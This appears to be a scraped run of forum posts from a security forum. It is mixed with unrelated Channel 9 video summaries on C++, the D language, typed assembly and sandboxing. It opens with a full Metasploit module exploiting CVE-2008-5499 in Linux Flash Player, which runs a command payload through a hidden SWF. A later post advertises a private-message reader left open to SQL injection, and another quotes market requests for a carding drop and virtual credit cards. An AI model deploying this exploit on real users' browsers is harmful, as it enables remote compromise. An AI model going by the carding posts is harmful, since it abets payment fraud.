     require 'msf/core'

     class Metasploit3 < Msf::Exploit::Remote
       Rank = GoodRanking

       include Msf::Exploit::Remote::HttpServer::HTML

       def initialize(info = {})
         super(update_info(info,
           'Name'           => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability',
           'Description'    => %q{
               This module exploits a vulnerability in Adobe Flash Player for Linux, version
               10.0.12.36 and 9.0.151.0 and prior. An input validation vulnerability allows
               command execution when the browser loads a SWF file which contains shell
               metacharacters in the arguments to the ActionScript launch method. The victim
               must have Adobe AIR installed for the exploit to work. This module was tested
               against version 10.0.12.36 (10r12_36).
           },
           'License'        => MSF_LICENSE,
           'Author'         =>
             [
               '0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version
             ],
           'References'     =>
             [
               ['CVE', '2008-5499'],
               ['OSVDB', '50796'],
               ['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html'],
               ['URL', 'http://www.securityfocus.com/bid/32896/exploit']
             ],
           'DefaultOptions' =>
             {
               'HTTP::compression' => 'gzip',
               'HTTP::chunked'     => true
             },
           'Platform'       => 'unix', # so unix cmd exec payloads are ok
           'Arch'           => ARCH_CMD,
           'Targets'        =>
             [
               [ 'Automatic', {}],
             ],
           'DisclosureDate' => 'Dec 17 2008',
           'DefaultTarget'  => 0))
       end

       def exploit
         path = File.join( Msf::Config.install_root, "data", "exploits", "CVE-2008-5499.swf" )
         fd = File.open( path, "rb" )
         @swf = fd.read(fd.stat.size)
         fd.close
         super
       end

       def on_request_uri(cli, request)
         msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"
         trigger = @swf
         trigger_file = rand_text_alpha(rand(6)+3) + ".swf"
         obj_id = rand_text_alpha(rand(6)+3)

         if request.uri.match(/\.swf/i)
           print_status("#{msg} Sending Exploit SWF")
           send_response(cli, trigger, { 'Content-Type' => 'application/x-shockwave-flash' })
           return
         end

         if request.uri.match(/\.txt/i)
           send_response(cli, payload.encoded, { 'Content-Type' => 'text/plain' })
           return
         end

         html = <<-EOS
     <html>
     <head>
     </head>
     <body>
     <center>
     <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="#{obj_id}" width="1" height="1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab">
       <param name="movie" value="#{get_resource}#{trigger_file}" />
       <embed src="#{get_resource}#{trigger_file}" quality="high" width="1" height="1" name="#{obj_id}" align="middle" allowNetworking="all" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer">
       </embed>
     </object>
     </center>
     </body>
     </html>
         EOS

         print_status("#{msg} Sending HTML...")
         send_response(cli, html, { 'Content-Type' => 'text/html' })
       end
     end

     Source: Adobe Flash Player ActionScript Launch Command Execution Vulnerability
  11. Blah blah blah. I want to see that picture. That's so I don't ban you both.
  12. Hi,
     I made a first version of the application for reading private messages. I know it looks like shit, but it's somewhat functional, a bit limited for now.
     Limitations:
     - looks like hell
     - the code isn't exactly written professionally
     - by default it only shows the last 30 private messages
     - it has no pagination at all
     - it only returns the last 100 (LIMIT) results (DESC) of searches
     - it has no protection against CSRF (laziness) or SQL Injection (so that searches don't have problems)
     - if the message is sent to several people, it doesn't show them
     I'll work on it more, maybe tomorrow or soon; it's 4:43 AM now.
     For now only these have access:
     - 3871 = Nytro
     - 989 = Zatarra
     - 21017 = pyth0n3
     - 13607 = begood
     - 15061 = MrRip
     - 1 = []kw3rln
     If anyone else wants access, contact me. Let me know about any problems.
     Link: https://rstcenter.com/linkeditat
     Good luck.
  13. JavaScript Deobfuscation: A Manual Approach
     Sudeep Singh, 4/15/2012

     Table of Contents:
     - Preface
     - Reasons for JavaScript Obfuscation
     - Javascript Minifiers vs Obfuscators
     - Methods of JavaScript Obfuscation
     - Basic JavaScript Obfuscation
     - Blackhole Exploit Kit
     - Breaking Point Obfuscated JS Challenge
     - JS Obfuscation in MetaSploit Framework
     - Conclusion
     - References

     Download: http://www.exploit-db.com/wp-content/themes/exploit/docs/18746.pdf
  14. Good, we keep seeding.
  15. https://www.secmaniac.com/blog/2012/04/12/disallowing-infosec-institute-to-leverage-set/
  16. RST Market

     I don't know what you wrote above, but at RST market, unapproved:

     dxbut: I need a drop (a person who receives a parcel of carded goods). Let's talk.
     ------------------------------------------------------------------------
     napoletanii: I'm buying a Virtual Credit Card with 50 usd on it, preferably Visa and one I can receive payments on. I pay in LR, estimated: for a vcc with a balance of 50 usd I pay 68 usd. I tried 2 sites from the multitude of "colours" on google (not having time to find out whether the sites are actually safe): https://www.instantvirtualcreditcards.com, I received the card instantly but the cards come with small amounts (between 5/10 usd); Buy VCC(Virtual Credit Card) Paypal VCC | Facebook VCC | ebay VCC | Facebook Coupons |and Virtual Credit Card for Online Purchase is a site newly made in January and I tried it, the transaction has been pending for 2 days;) as a result I ended up with this option.
  17. Holy shit, you people are brain damaged. Now it's 2 dollars a day, now 5 dollars a week... What the hell do you do with this "money"? Get jobs as windshield washers; those little gypsies make 25-30 RON a day, that is 10 dollars a day, meaning they piss on you, beggars. Money from clicks? Can't you do anything else? Is that all your grey matter can offer you, clicking? Do some damn projects, 2-3 for free, then 2-3 cheaper, then money comes in, things pile up on the CV, you get a job and take 1500 - 2000 RON as a first salary, which is more than 2 dollars a day.
  18. GoingNative 6: Walter Bright and Andrei Alexandrescu - D Programming Language
Posted: Feb 21, 2012 at 4:21 PM By: Charles

We're back! Sorry for the delay between episodes, but we were busy preparing and then putting on GoingNative 2012, a C++11 conference that you have hopefully heard about. It was a blast! Such great speakers. Such great attendees. Huge thanks to all of you who made the journey to Redmond for two days, bringing with you so much IQ and C++ love. And to those who watched the show live online, thank you, too, of course! All sessions will always be available on-demand right here on C9. Watch at your leisure, but do watch/listen/learn!

We were fortunate and honored to have Andrei Alexandrescu speaking and Walter Bright in attendance at GoingNative 2012. Walter and Andrei are the co-custodians of the D programming language. Walter invented D about 11 or 12 years ago. Andrei has been an unrelenting champion and contributor to D for a long time and is the author of the book The D Programming Language. When/why did Andrei get involved with D? We'll find out. We filmed a conversation with these two legends right after GoingNative 2012 ended.

So, what is D? What makes it special? D is a modern native programming language (not really an evolution of C++ as the name might imply. C++11 is an evolution of C++... D is its own thing. It's D.). D is imperative (with C-like syntax), statically-typed, object-oriented, dynamic-friendly (via static type inference), garbage collected (optional), shared-nothing by default (nice!), functional-friendly (you can write pure functions that are verifiably pure), polymorphic, generic, and COM-friendly, too. D is also a low-level systems programming language. D takes many powerful modern programming ideas and idioms and makes them easy to use while keeping things purely native. We love this! Too often we hear things like, "Well, if you go fully native then you lose productivity..." Whatever. D proves you can have your cake and eat it, too.

Tune in. Meet Walter and Andrei (and D, if you're not familiar with it). Thanks for spending time with C9, Walter and Andrei! Keep pushing the native envelope. "I want 1,000,000 users", says Andrei. Go D!

Download D
D Forums (written in D)
Modern COM Programming in D

Table of Contents:
[00:00] GoingNative(); //Welcome back! Sorry for the delay. GoingNative 2012. D.
[02:22] Charles has a conversation with Andrei Alexandrescu and Walter Bright about the D programming language
[56:52] ~GoingNative(); //Charles and Diego talk about D and then destruct.

Download:
http://ch9files.blob.core.windows.net/ch9/f260/d027378a-61c9-4fbc-8b22-9ffd0147f260/GoingNative6TheDLanguageAndreiWalter_2MB_ch9.wmv
http://ch9files.blob.core.windows.net/ch9/f260/d027378a-61c9-4fbc-8b22-9ffd0147f260/GoingNative6TheDLanguageAndreiWalter_high_ch9.mp4
Online: http://channel9.msdn.com/Shows/C9-GoingNative/GoingNative-6-The-D-Episode-with-Walter-Bright-and-Andrei-Alexandrescu
  19. GoingNative 5: Inside the Visual C++ IDE, Meet Raul Pérez
Posted: Dec 28, 2011 at 10:21 AM By: Charles

Happy Holidays to all of you out there who are in some sort of holiday state. If not, then happy holidays anyway from Diego, Charles, C9, and VC.

We don't cover software testing—the job discipline—often enough on C9. We aim to change that starting now. A friend of Diego's on the VC++ team, Raul Pérez, is a software developer from Puerto Rico who works in QA for the Visual C++ IDE team. He writes tests to make sure the very-front-end of the VC toolchain—the IDE and its design-time compiler infrastructure—works as expected.

There's a lot going on when you type characters into the VC++ editor. What happens, exactly? Why? What types of things can make Intellisense fast? What types of things can hinder the performance of the IDE? How does all of this magic happen? There's a compiler involved in all of this. It's not the front-end compiler (cl), but it is a front-end compiler and it compiles your source into data that's stored in a local DB for design-time use by Intellisense, Go-To-Definition, Syntax Coloring, Reference Highlighting, Auto-Completion, etc... All of these things are part of the set of IDE features that make Visual C++ visual...

So, meet Raul and learn a thing or two about how the IDE works under the covers and how the system has evolved over time.

Table of Contents (click time code links to navigate player accordingly)
[00:00] GoingNative(); //Getting faster at show construction - still have some optimizations to make...
[01:56] Charles interviews Raul about Raul and the VC++ design-time system (Intellisense, Go-to-Definition, Auto-complete, Syntax coloring, etc...)
[37:20] ~GoingNative(); //We're really performant this time

We really want to hear from you, so please tweet feedback to @C9GoingNative (follow us!) and send your requests, ideas, complaints, praises, hate mail, and love letters to C9GoingNative [at] hotmail [dot] com. We will read and respond to all messages! That's how we roll, brothers and sisters. And if you're a Facebook user, please join our C9::GoingNative Facebook group. Go native!

Download:
http://ch9files.blob.core.windows.net/ch9/cbd3/4b7b0d6f-d9a8-4b9d-af65-9fc10010cbd3/C9GoingNative5RaulFrontEndIDE_2MB_ch9.wmv
http://ch9files.blob.core.windows.net/ch9/cbd3/4b7b0d6f-d9a8-4b9d-af65-9fc10010cbd3/C9GoingNative5RaulFrontEndIDE_high_ch9.mp4
Online: http://channel9.msdn.com/Shows/C9-GoingNative/GoingNative-5-Inside-the-Visual-C-ID-Meet-Raul-Prez
  20. GoingNative 3: The C++/CX Episode with Marian Luparu
Posted: Oct 26, 2011 at 10:24 AM By: Charles

This is the C++/CX episode - everything you ever wanted to know, but were afraid to ask... C++/CX language design team member Marian Luparu sits in the hot seat to answer some questions (a few from the GoingNative community - thank you!), draw on the whiteboard and demo some code. It's all about C++/CX. Tune in.

Table of Contents (click time code links to navigate player accordingly)
[00:00] GoingNative(); //Welcome. Diego spreads the news.
[06:05] Charles interviews Marian Luparu (Whiteboarding included)
[43:04] Marian Luparu demos some C++/CX and C++
[58:37] ~GoingNative(); //Charles and Diego recap. Don't fear the hat.

We really want to hear from you, so please tweet feedback to @C9GoingNative (follow us!) and send your requests, ideas, complaints, praises, hate mail, and love letters to C9GoingNative at hotmail com. We will read and respond to all messages! That's how we roll, brothers and sisters. If you are a Facebook user, then please join our C9::GoingNative Facebook group. Go native!

Download:
http://ch9files.blob.core.windows.net/ch9/7962/4d1ad71a-fee6-41ce-b152-9f86011f7962/GoingNative3_2MB_ch9.wmv
http://ch9files.blob.core.windows.net/ch9/7962/4d1ad71a-fee6-41ce-b152-9f86011f7962/GoingNative3_high_ch9.mp4
Online: http://channel9.msdn.com/Shows/C9-GoingNative/GoingNative-3-The-CCX-Episode-with-Marian-Luparu
  21. Introduction to Typed Assembly Language (TAL)
Posted: May 11, 2011 at 9:33 AM By: Charles

Typed Assembly Language (TAL) extends traditional untyped assembly languages with typing annotations, memory management primitives, and a sound set of typing rules. These typing rules guarantee the memory safety, control flow safety, and type safety of TAL programs. Moreover, the typing constructs are expressive enough to encode most source language programming features including records and structures, arrays, higher-order and polymorphic functions, exceptions, abstract data types, subtyping, and modules. Just as importantly, TAL is flexible enough to admit many low-level compiler optimizations. Consequently, TAL is an ideal target platform for type-directed compilers that want to produce verifiably safe code for use in secure mobile code applications or extensible operating system kernels. [Source]

You've met Microsoft research scientist and operating system expert Chris Hawblitzel before. He's the architect and lead researcher of the Verve operating system research project from MSR. As you learned in that interview, typed assembly language and Hoare logic were employed to verify the absence of many kinds of errors in low-level code. Chris et al. use TAL and Hoare logic to achieve highly automated, static verification of the safety of Verve. We didn't spend much time on TAL during the Verve interview, so we decided to remedy that. Enter computer scientist and RiSE team member Juan Chen who did much of the TAL work for Verve. After you watch this video, you should read this paper to go much deeper.

Tune in and get a sense of what TAL is, how type verification works for assembly code, benefits, trade-offs, and much more. Enjoy.

Download:
http://ch9files.blob.core.windows.net/ch9/6f8d/5edac2dc-adcc-4b2e-93b7-9ecc016c6f8d/MSRTypedAssemblyLanguage_2MB_ch9.wmv
http://ch9files.blob.core.windows.net/ch9/6f8d/5edac2dc-adcc-4b2e-93b7-9ecc016c6f8d/MSRTypedAssemblyLanguage_high_ch9.mp4
Online: http://channel9.msdn.com/Shows/Going+Deep/Chris-Hawblitzel-and-Juan-Chen-Introduction-to-Typed-Assembly-Language-TAL
  22. .NET 4.5: David Kean and Mircea Trofin - Portable Libraries
Posted: Sep 27, 2011 at 10:16 AM By: Charles

The Portable Class Library project enables you to write and build managed assemblies that work on more than one .NET Framework platform. You can create classes that contain code you wish to share across many projects, such as shared business logic, and then reference those classes from different types of projects. Using the Portable Class Library project, you can build portable assemblies that work without modification on the .NET Framework, Silverlight, Windows Phone 7, or Xbox 360 platforms. Without the Portable Class Library project, you must target a single platform and then manually rework the class library for other platforms. The Portable Class Library project supports a subset of assemblies from these platforms, and provides a Visual Studio template that makes it possible to build assemblies that run without modification on these platforms. [source = MSDN]

The portable libraries project ships as part of Visual Studio 11 Developer Preview. You can build portable .NET class libraries by simply creating a Portable Class Library project (template provided for you) and choosing the platform targets. The IDE will then create the appropriate reference assemblies for you and you can then program as you normally would.

Here, we meet Portable Libraries project developer David Kean and program manager Mircea Trofin to learn more. Whiteboarding included.

Download:
http://ch9files.blob.core.windows.net/ch9/028f/b006b5c5-f3c7-4a37-9747-9f670184028f/NET45VS11InsidePortableLibraries_2MB_ch9.wmv
http://ch9files.blob.core.windows.net/ch9/028f/b006b5c5-f3c7-4a37-9747-9f670184028f/NET45VS11InsidePortableLibraries_high_ch9.mp4
Online: http://channel9.msdn.com/Shows/Going+Deep/NET-45-David-Kean-and-Marcea-Trofin-Portable-Libraries
  23. Herb Sutter, Andrei Alexandrescu and Scott Meyers - C++11
Posted: Oct 04, 2011 at 9:25 AM By: Charles

I was able to attend C++ and Beyond 2011 and it was a tremendous experience. The technical depth and C++ goodness was profound and lasted for 3 whole days (and two evenings). Thanks Andrei Alexandrescu, Scott Meyers and Herb Sutter for allowing me to crash your affair with my camera - which was perhaps too big and too advanced for the likes of me - still, I was able to capture some great content like this panel on C++11 with Scott, Andrei and Herb. Great questions from attendees.

Note that this is the first in a series of three panels from C++ and Beyond 2011 that will appear on C9 over the coming months. Make sure to check out all the C&B 2011 content we're lucky enough to have stored on C9.

Enjoy! Learn!

Table of contents (click on the time code link to move the player to that point in time...):
[00:19] When should new C++11 features be adopted in production?
[09:28] C++11 Memory Model
[15:23] Which C++11 features remain broadly missing?
[16:25] When can we expect full C++11 conformance from the major compilers?
[19:45] -> Herb Sutter asks YOU a question (please answer on this thread): What do you want the standards committee to work on next? Should they immediately start work on new features? Should they take a break before new feature work?
[21:45] What about debugging, linking and tools - as it relates to C++11?
[23:56] What really happened to Concepts?
[29:07] Will existing code have to be changed just to compile with a new C++11 conforming compiler?
[29:38] Why was a seemingly complicated feature (to implement) like variadic templates rolled out sooner than a seemingly simple feature like templated typedefs?
[32:42] What do you think we'll get wrong most often when using C++11 features?
[45:13] Return by ref or by value - is there a universal rule of thumb?
[48:32] Why don't lambdas have typedefs for argument types?
[53:02] How do you capture enclosing scope variables when using lambdas?

Download:
http://ch9files.blob.core.windows.net/ch9/ecc8/aacddb61-f53f-4264-abb1-9f420166ecc8/CppBeyond11Cpp11Panel_2MB_ch9.wmv
http://ch9files.blob.core.windows.net/ch9/ecc8/aacddb61-f53f-4264-abb1-9f420166ecc8/CppBeyond11Cpp11Panel_high_ch9.mp4
Online: http://channel9.msdn.com/Shows/Going+Deep/C-and-Beyond-2011-C11-Panel-Scott-Meyers-Andrei-Alexandrescu-and-Herb-Sutter
  24. Drawbridge: A new form of virtualization for application sandboxing
Posted: Oct 17, 2011 at 10:27 AM By: Charles

Drawbridge is a research prototype of a new form of virtualization for application sandboxing. Drawbridge combines two core technologies: First, a picoprocess, which is a process-based isolation container with a minimal kernel API surface. Second, a library OS, which is a version of Windows enlightened to run efficiently within a picoprocess. Drawbridge combines two ideas from the literature, the picoprocess and the library OS, to provide a new form of computing, which retains the benefits of secure isolation, persistent compatibility, and execution continuity, but with drastically lower resource overheads.

The Drawbridge library OS is an experimental Windows 7 library OS - a research project and proving ground for a larger concept: application virtualization and sandboxing. Drawbridge is capable of running the latest releases of major Windows applications such as Microsoft Excel, PowerPoint, and Internet Explorer with very little overhead compared to the traditional virtualization techniques. The experiment is going well!

Now, what's going on here, exactly? Drawbridge research team members Galen Hunt, Reuben Olinsky and Jon Howell dig into some of the details, including project rationale and OS architecture, of research project Drawbridge.

Paper: Rethinking the Library OS from the Top Down - Microsoft Research

Download:
http://ch9files.blob.core.windows.net/ch9/f427/abf131e6-cd47-4335-94d8-9e8d000bf427/MSRDrawbridgeAppVirtualizationResearch_2MB_ch9.wmv
http://ch9files.blob.core.windows.net/ch9/f427/abf131e6-cd47-4335-94d8-9e8d000bf427/MSRDrawbridgeAppVirtualizationResearch_high_ch9.mp4
Online: http://channel9.msdn.com/Shows/Going+Deep/Drawbridge-An-Experimental-Library-Operating-System